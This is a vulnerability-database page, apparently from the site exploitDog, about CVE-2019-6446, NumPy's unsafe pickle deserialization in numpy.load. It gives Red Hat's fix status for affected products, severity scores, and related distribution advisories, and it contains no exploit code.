Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

redhat логотип

CVE-2019-6446

Опубликовано: 16 янв. 2019
Источник: redhat
CVSS3: 8.8
EPSS Средний

Описание

An issue was discovered in NumPy before 1.16.3. It uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object, as demonstrated by a numpy.load call. NOTE: third parties dispute this issue because it is a behavior that might have legitimate applications in (for example) loading serialized Python object arrays from trusted and authenticated sources.

Отчет

Red Hat Enterprise Virtualization Management Appliance includes the vulnerable version of numpy, however it is not used and this vulnerability is not exposed. Red Hat OpenStack Platform includes a vulnerable version of numpy, however it is not used in a vulnerable manner.

Затронутые пакеты

ПлатформаПакетСостояниеРекомендацияРелиз
Red Hat Ceph Storage 4numpyAffected
Red Hat Enterprise Linux 6numpyWill not fix
Red Hat Enterprise Linux 7numpyWill not fix
Red Hat OpenStack Platform 13 (Queens)numpyWill not fix
Red Hat OpenStack Platform 14 (Rocky)numpyWill not fix
Red Hat Software Collectionspython27-numpyWill not fix
Red Hat Software Collectionsrh-python35-numpyWill not fix
Red Hat Software Collectionsrh-python36-numpyWill not fix
Red Hat Virtualization 4rhvm-applianceWill not fix
Red Hat Enterprise Linux 8python27FixedRHSA-2019:333505.11.2019

Показывать по

Ссылки на источники

Дополнительная информация

Статус:

Moderate
Дефект:
CWE-358->CWE-20
https://bugzilla.redhat.com/show_bug.cgi?id=1667950numpy: crafted serialized object passed in numpy.load() in pickle python module allows arbitrary code execution

EPSS

Процентиль: 98%
0.61146
Средний

8.8 High

CVSS3

Связанные уязвимости

ubuntu логотип

CVE-2019-6446

CVSS3: 9.8
ubuntu
почти 7 лет назад

An issue was discovered in NumPy before 1.16.3. It uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object, as demonstrated by a numpy.load call. NOTE: third parties dispute this issue because it is a behavior that might have legitimate applications in (for example) loading serialized Python object arrays from trusted and authenticated sources.

nvd логотип

CVE-2019-6446

CVSS3: 9.8
nvd
почти 7 лет назад

An issue was discovered in NumPy before 1.16.3. It uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object, as demonstrated by a numpy.load call. NOTE: third parties dispute this issue because it is a behavior that might have legitimate applications in (for example) loading serialized Python object arrays from trusted and authenticated sources.

debian логотип

CVE-2019-6446

CVSS3: 9.8
debian
почти 7 лет назад

An issue was discovered in NumPy before 1.16.3. It uses the pickle Pyt ...

suse-cvrf логотип

openSUSE-SU-2019:2227-1

suse-cvrf
около 6 лет назад

Security update for python-numpy

suse-cvrf логотип

openSUSE-SU-2019:2225-1

suse-cvrf
около 6 лет назад

Security update for python-numpy

EPSS

Процентиль: 98%
0.61146
Средний

8.8 High

CVSS3

Уязвимость CVE-2019-6446